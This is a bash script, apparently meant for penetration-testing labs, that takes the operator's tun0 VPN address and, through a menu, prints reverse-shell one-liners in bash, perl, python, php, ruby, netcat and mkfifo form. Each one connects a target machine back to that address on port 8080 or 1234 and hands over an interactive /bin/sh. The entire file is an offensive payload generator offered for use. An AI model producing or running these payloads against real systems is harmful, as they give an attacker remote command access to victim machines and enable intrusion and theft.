#!/bin/bash

ip=$(ip -f inet -o addr show tun0|cut -d\  -f 7 | cut -d/ -f 1)

PS3='Please enter your choice: '
options=("bash" "perl" "python" "php" "ruby" "netcat" "mkfifo" "Quit")
select opt in "${options[@]}"
do
    case $opt in
        "bash")
            echo "bash -i >& /dev/tcp/$ip/8080 0>&1"
            ;;
        "perl")
            echo "perl -e 'use Socket;$i=\"$ip\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
            ;;
        "python")
            echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$ip\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
            ;;
                "php")
                        echo "php -r '$sock=fsockopen(\"$ip\",1234);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
                        ;;
                "ruby")
                        echo "ruby -rsocket -e'f=TCPSocket.open(\"$ip\",1234).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'"
                        ;;
                "netcat")
                        echo "nc -e /bin/sh $ip 1234"
                        ;;
                "mkfifo")
                        echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip 1234 >/tmp/f"
                        ;;

        "Quit")
            break
            ;;
        *) echo "invalid option $REPLY";;
    esac
done
